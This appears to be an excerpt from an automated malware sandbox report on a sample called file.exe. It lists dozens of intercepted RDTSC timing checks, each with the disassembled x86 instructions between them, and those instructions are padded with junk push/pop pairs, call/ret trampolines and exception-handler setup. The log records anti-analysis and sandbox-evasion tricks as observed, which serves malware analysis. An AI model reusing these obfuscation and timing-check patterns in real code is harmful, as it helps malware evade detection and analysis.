Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C2E2 second address: F3C2F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D4900D0CFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C5A6 second address: F3C5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C5AC second address: F3C5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 jp 00007F9D4900D0C6h 0x0000000c pop ecx 0x0000000d push esi 0x0000000e jmp 00007F9D4900D0D5h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9D4900D0D2h 0x0000001a je 00007F9D4900D0C6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C8D0 second address: F3C8DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F9D493C17D2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F31BA0 second address: F31BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F31BA4 second address: F31BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3CA5A second address: F3CA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 jne 00007F9D4900D0D4h 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3CA69 second address: F3CA6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3D2A7 second address: F3D2C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3D2C4 second address: F3D2DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F9D493C17C6h 0x00000009 jmp 00007F9D493C17CCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3D43F second address: F3D445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F31B74 second address: F31BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9D493C17C6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d jp 00007F9D493C17DAh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4250F second address: F42513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F42ACD second address: F42AD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F41382 second address: F413A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jmp 00007F9D4900D0D4h 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F03808 second address: F0380C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0380C second address: F03819 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9D4900D0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48803 second address: F4880C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4880C second address: F48820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9D4900D0C6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48820 second address: F48824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48824 second address: F4882E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9D4900D0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F47F54 second address: F47F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F480D0 second address: F480DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 je 00007F9D4900D0C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F480DF second address: F480E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48529 second address: F48532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48532 second address: F48537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48537 second address: F4854D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jbe 00007F9D4900D0C6h 0x0000000c popad 0x0000000d push esi 0x0000000e jc 00007F9D4900D0C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A602 second address: F4A608 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A608 second address: F4A62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D4900D0CDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9D4900D0D0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A62E second address: F4A647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F9D493C17D3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F002A6 second address: F002C8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9D4900D0C8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007F9D4900D0C8h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 jno 00007F9D4900D0C6h 0x0000001c push edx 0x0000001d pop edx 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4B27C second address: F4B295 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4B295 second address: F4B29B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4B89E second address: F4B8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4B9DF second address: F4B9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4B9EB second address: F4B9F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4BAE9 second address: F4BAEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4BB7D second address: F4BB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4BB82 second address: F4BB87 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4BD9E second address: F4BDC4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9D493C17D9h 0x00000008 jmp 00007F9D493C17D3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4BDC4 second address: F4BDC9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4BE76 second address: F4BE81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F9D493C17C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4BED2 second address: F4BEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F9D4900D0CDh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4DF08 second address: F4DF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F9D493C17D0h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4DF23 second address: F4DF29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4DF29 second address: F4DF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4F5D3 second address: F4F614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F9D4900D0CCh 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007F9D4900D0D9h 0x00000017 js 00007F9D4900D0CCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F509FB second address: F509FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F509FF second address: F50A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5167A second address: F51685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F9D493C17C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5216D second address: F52172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F576F6 second address: F576FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F576FB second address: F57777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F9D4900D0C8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 clc 0x00000023 push 00000000h 0x00000025 mov ebx, 457C7F7Ch 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F9D4900D0C8h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 add ebx, 0BF9D2F9h 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 pop edx 0x00000052 pop eax 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F9D4900D0D3h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F57777 second address: F5777D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F58732 second address: F58740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F58740 second address: F5874A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9D493C17C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5793E second address: F57951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 jp 00007F9D4900D0C8h 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F587DF second address: F587E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F587E5 second address: F587E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F587E9 second address: F587F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F587F9 second address: F587FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F587FE second address: F58817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D493C17D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F58A3E second address: F58A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D4900D0CAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5B28F second address: F5B303 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F9D493C17CBh 0x0000000d nop 0x0000000e sub di, B96Bh 0x00000013 sub dword ptr [ebp+1248F2DCh], ecx 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov dword ptr [ebp+122D20D3h], esi 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007F9D493C17C8h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 mov dword ptr [ebp+122D3737h], esi 0x0000004d mov eax, dword ptr [ebp+122D10BDh] 0x00000053 push FFFFFFFFh 0x00000055 mov bh, 66h 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F9D493C17D1h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F58A4D second address: F58A52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5C20E second address: F5C28E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F9D493C17CBh 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F9D493C17C8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c or bx, DD30h 0x00000031 mov dword ptr [ebp+122D1CA4h], edi 0x00000037 push 00000000h 0x00000039 mov ebx, dword ptr [ebp+122D2EA2h] 0x0000003f push 00000000h 0x00000041 movzx ebx, cx 0x00000044 xchg eax, esi 0x00000045 pushad 0x00000046 push edx 0x00000047 jmp 00007F9D493C17CBh 0x0000004c pop edx 0x0000004d jnl 00007F9D493C17C8h 0x00000053 pushad 0x00000054 popad 0x00000055 popad 0x00000056 push eax 0x00000057 push esi 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F9D493C17CDh 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5B303 second address: F5B325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F9D4900D0CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F58A52 second address: F58A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5B325 second address: F5B329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F58A61 second address: F58A65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5D342 second address: F5D3B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jo 00007F9D4900D0C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f and bx, 78A4h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F9D4900D0C8h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 jp 00007F9D4900D0C6h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F9D4900D0C8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 sub ebx, 01664273h 0x00000058 mov dword ptr [ebp+124729FBh], eax 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5D3B2 second address: F5D3B8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5E342 second address: F5E352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F9D4900D0C8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5D4E4 second address: F5D50F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9D493C17D4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5E352 second address: F5E3BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, dword ptr [ebp+122D2D5Ch] 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 add ebx, dword ptr [ebp+122D1E4Ah] 0x00000019 pop ebx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F9D4900D0C8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 xor edi, dword ptr [ebp+122D304Eh] 0x0000003c xchg eax, esi 0x0000003d push ebx 0x0000003e pushad 0x0000003f jne 00007F9D4900D0C6h 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 popad 0x00000048 pop ebx 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push esi 0x0000004d jmp 00007F9D4900D0D0h 0x00000052 pop esi 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5D5D9 second address: F5D5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F62605 second address: F6260B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6260B second address: F62615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9D493C17C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F62615 second address: F6264A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ebx, dword ptr [ebp+122D2F16h] 0x00000012 push 00000000h 0x00000014 stc 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+124839CAh] 0x0000001d push eax 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 jne 00007F9D4900D0C6h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F63613 second address: F63665 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b jmp 00007F9D493C17D3h 0x00000010 nop 0x00000011 jmp 00007F9D493C17D4h 0x00000016 push 00000000h 0x00000018 sub dword ptr [ebp+12472C18h], esi 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+122D29B1h], edx 0x00000026 push eax 0x00000027 jg 00007F9D493C17DEh 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F61758 second address: F6175D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6379D second address: F637FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 clc 0x00000009 push dword ptr fs:[00000000h] 0x00000010 ja 00007F9D493C17CCh 0x00000016 mov dword ptr [ebp+12463446h], ecx 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 jns 00007F9D493C17CCh 0x00000029 and edi, dword ptr [ebp+122D302Ah] 0x0000002f mov dword ptr [ebp+124729AAh], eax 0x00000035 mov eax, dword ptr [ebp+122D165Dh] 0x0000003b xor ebx, dword ptr [ebp+122D3DB3h] 0x00000041 push FFFFFFFFh 0x00000043 mov ebx, dword ptr [ebp+12460B19h] 0x00000049 nop 0x0000004a push edi 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F9D493C17CAh 0x00000052 rdtsc
